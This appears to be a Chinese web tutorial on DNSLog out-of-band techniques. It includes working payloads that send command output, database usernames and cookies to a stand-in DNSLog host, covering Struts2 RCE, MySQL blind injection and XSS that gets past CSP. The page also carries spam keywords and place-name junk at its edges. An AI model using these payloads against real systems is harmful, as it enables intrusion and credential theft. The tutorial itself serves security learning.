最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

DNSLog使用方法及場景分析

 更新時間:2023年05月23日 10:20:39   作者:why so serious -a  
這篇文章主要介紹了DNSLog使用方法,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下

DNSLOG的原理

DNS的解析是遞歸與迭代相結(jié)合的,下面給出了當我們訪問www.cloudcrowd.com.cn時,DNS的解析過程示意圖。

其中,紅色部分是可控的。我們只需要搭建一個紅色部分的DNS服務器,并將要盲打或盲注的回顯,放到自己域名的二級甚至三級域名上去請求,就可以通過DNS解析日志來獲取到它們。

DNSLOG工具

如果有自己的服務器和域名,可以自建一個這樣的平臺,直接使用BugScan團隊開源的工具搭建即可:

https://github.com/BugScanTeam/DNSLog。

另外我們也可以使用在線平臺:

http://admin.dnslog.link。

http://ceye.io。

場景一:命令盲注回顯

針對不回顯的命令注入漏洞,我們很難確定漏洞的存在并進一步利用,如17年9月爆發(fā)的Struts2-052反序列化命令執(zhí)行漏洞是看不到任何回顯的,針對這種情況,我們可以利用DNSLOG來獲取命令的執(zhí)行結(jié)果。這里使用已有的EXP來完成漏洞利用,EXP地址為https://github.com/luc10/struts-rce-cve-2017-9805。

利用方式為go run main.go -u URL -c “command”。

Payload:

go run main.go -u http://www.exploit-target.com/struts2-rest-showcase/orders.xhtml -c 'curl "http://`whoami`.your-dnslog.com"'

根據(jù)語法規(guī)定,會先將雙引號中的whoami命令執(zhí)行并替換為結(jié)果,再執(zhí)行整個的curl命令??梢栽赪eb控制臺下看到結(jié)果:

可以看到本來看不到的whoami回顯root已經(jīng)被我們接收到了。為了防止內(nèi)容不適合作為域名的一部分,我們也可以base64編碼后再進行請求。

場景二:SQL盲注回顯

不論是bool型盲注還是時間型盲注,都需要頻繁的跑請求才能夠獲取數(shù)據(jù)庫中的值,在現(xiàn)代WAF的防護下,很可能導致IP被ban。我們可以結(jié)合DNSLOG完美快速的將數(shù)據(jù)取出。如遇到MySql的盲注時,可以利用內(nèi)置函數(shù)load_file()來完成DNSLOG。load_file()不僅能夠加載本地文件,同時也能對諸如\www.test.com這樣的URL發(fā)起請求。

Payload: select load_file(concat(‘\\', user(), ‘.your-dnslog.com'));

可以在Web控制臺下看到結(jié)果:

用戶名已經(jīng)被發(fā)送到了我們的服務器上。

場景三: XSS繞過CSP

CSP(內(nèi)容安全策略)是防御XSS最有效的手段之一。當我們發(fā)現(xiàn)一個網(wǎng)站有XSS漏洞,想利用XSS平臺來打Cookie時,CSP會通過白名單的方式,禁止跨域加載腳本,惡意代碼便會因此被阻擋在門外,導致此XSS無法利用。對此,我們可以使用DNS預解析突破CSP的阻攔。

DNS預解析(DNS Prefetching)是一種能夠加快網(wǎng)頁加載速度的技術(shù),對于跨站的鏈接,由于每次都要進行一次DNS解析,會消耗掉很多時間。DNS預解析在瀏覽器空閑時,將跨站資源的域名轉(zhuǎn)化為IP 地址并緩存,真正請求資源時就避免了解析的時間。

有趣的是,DNS預解析是默認開啟的,并且我們可以通過rel="dns-prefetch"來強制進行DNS預解析。由于DNS預解析可以繞過CSP進行解析,結(jié)合DNSLOG,我們即可竊取在CSP保護下的Cookie。

Payload:document.querySelector('body').innerHTML += "<link rel='dns-prefetch' href='" + window.btoa(document.cookie.split(/;|=/)[1]) + ".your-dnslog.com'>"

上面的Payload將Cookie中截取的重要字段進行簡單的base64編碼后,作為我們DNSLOG平臺的二級域名,并在body中插入了相應的link標簽對此域名進行強制DNS預解析。當觸發(fā)XSS攻擊時,可以在Web控制臺下看到結(jié)果:

直接對R0ExLjIuMTY0MjI2NDMxNi4xNTMyNTc0NTg3解碼即可得到Cookie。當然,這種方法的利用條件極為苛刻。首先,作為XSS攻擊,此Payload過長,而使用短連接加載外部腳本則又會回到被CSP限制的原點;其次,根據(jù)DNS的規(guī)定,域名的長度是有限制的,有時可能無法將長Cookie完全帶出。·本文僅分享一個拋磚引玉的思路,進一步的利用方式還有待開發(fā)。

結(jié)語

除了上面詳細列出的例子之外,DNSLOG還可以利用在諸如Blind XXE和Blind SSRF之類的漏洞上,原理其實和命令盲注是一樣的,在此不做詳述。有興趣的讀者可以自行探索與驗證。

到此這篇關(guān)于DNSLog使用方法的文章就介紹到這了,更多相關(guān)DNSLog使用方法內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Win2003 DNS服務器創(chuàng)建多個域名

    Win2003 DNS服務器創(chuàng)建多個域名

    某公司局域網(wǎng)的服務器基于Windows Server 2003,并搭建了DNS服務器?,F(xiàn)在準備建立若干域名,使它們分別應用在HTTP瀏覽、FTP登錄、論壇訪問和E-mail收發(fā)等方面。如何在DNS服務器中實現(xiàn)這一設(shè)想呢?
    2011-01-01
  • win2003 DNS服務器配置方法[圖文詳解]

    win2003 DNS服務器配置方法[圖文詳解]

    目前很多企業(yè)事業(yè)單位都建立了單位內(nèi)部的局域網(wǎng),網(wǎng)絡內(nèi)部都配備相關(guān)的服務器(如web、ftp等服務器)。內(nèi)部網(wǎng)絡的用戶都希望所有的服務器都用域名來訪問,網(wǎng)絡管理員可以采用在內(nèi)部搭建DNS服務器的方式來實現(xiàn)
    2012-10-10
  • 非常好用的DNS服務器(推薦)

    非常好用的DNS服務器(推薦)

    本文主要介紹了非常好用的DNS服務器,這些 DNS 服務器都可以免費使用,不同地區(qū)的 DNS 解析速度可能會有所不同,建議選擇距離自己較近的 DNS 服務器以獲得更好的解析速度,下面就一起來了解一下
    2023-10-10
  • Windows Server 2019 DNS服務器的配置與管理之DNS轉(zhuǎn)發(fā)器

    Windows Server 2019 DNS服務器的配置與管理之DNS轉(zhuǎn)發(fā)器

    這篇文章主要介紹了Windows Server 2019 DNS服務器的配置與管理之DNS轉(zhuǎn)發(fā)器,需要的朋友可以參考下
    2023-05-05
  • DNS服務器 支持泛域名解析的設(shè)置方法 [修正版本]

    DNS服務器 支持泛域名解析的設(shè)置方法 [修正版本]

    很多企業(yè)都架設(shè)了多個Web站點來滿足員工的工作需要,為了節(jié)省費用,這些網(wǎng)站通常采用虛擬主機技術(shù),即在同一個服務器上架設(shè)多個網(wǎng)站,員工使用二級域名訪問這些站點。
    2009-06-06
  • Windows?Server?2008?R2?搭建域及DNS環(huán)境

    Windows?Server?2008?R2?搭建域及DNS環(huán)境

    這篇文章主要介紹了Windows?Server?2008?R2?搭建域及DNS環(huán)境,需要的朋友可以參考下
    2023-05-05
  • 深入理解DNSlog

    深入理解DNSlog

    本文主要介紹了深入理解DNSlog,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2023-05-05
  • DNSLog使用方法及場景分析

    DNSLog使用方法及場景分析

    這篇文章主要介紹了DNSLog使用方法,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下
    2023-05-05
  • 從斷網(wǎng)事件分析DNS服務器拒絕服務攻擊

    從斷網(wǎng)事件分析DNS服務器拒絕服務攻擊

    2009年5月19日21時50分開始,江蘇、安徽、廣西、海南、甘肅、浙江等6省用戶申告訪問網(wǎng)站速度變慢或無法訪問。主要表現(xiàn)為域名解析(DNS)響應緩慢或者無法解析。直至5月22日事件才漸漸平息。
    2009-06-06
  • DNS服務器可能不可用的解決方法

    DNS服務器可能不可用的解決方法

    這篇文章主要介紹了DNS服務器可能不可用的解決方法,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2006-11-11

最新評論

仲巴县| 绥滨县| 遂川县| 保德县| 盐边县| 宽城| 句容市| 威远县| 绿春县| 健康| 阜平县| 奉化市| 平原县| 海盐县| 昌黎县| 博客| 洛扎县| 黄龙县| 台江县| 琼海市| 绍兴市| 嘉黎县| 恩平市| 涟源市| 呼伦贝尔市| 万州区| 宣武区| 阿荣旗| 大荔县| 高平市| 刚察县| 西昌市| 襄城县| 阿拉善盟| 重庆市| 哈尔滨市| 阿瓦提县| 个旧市| 新余市| 库车县| 巢湖市|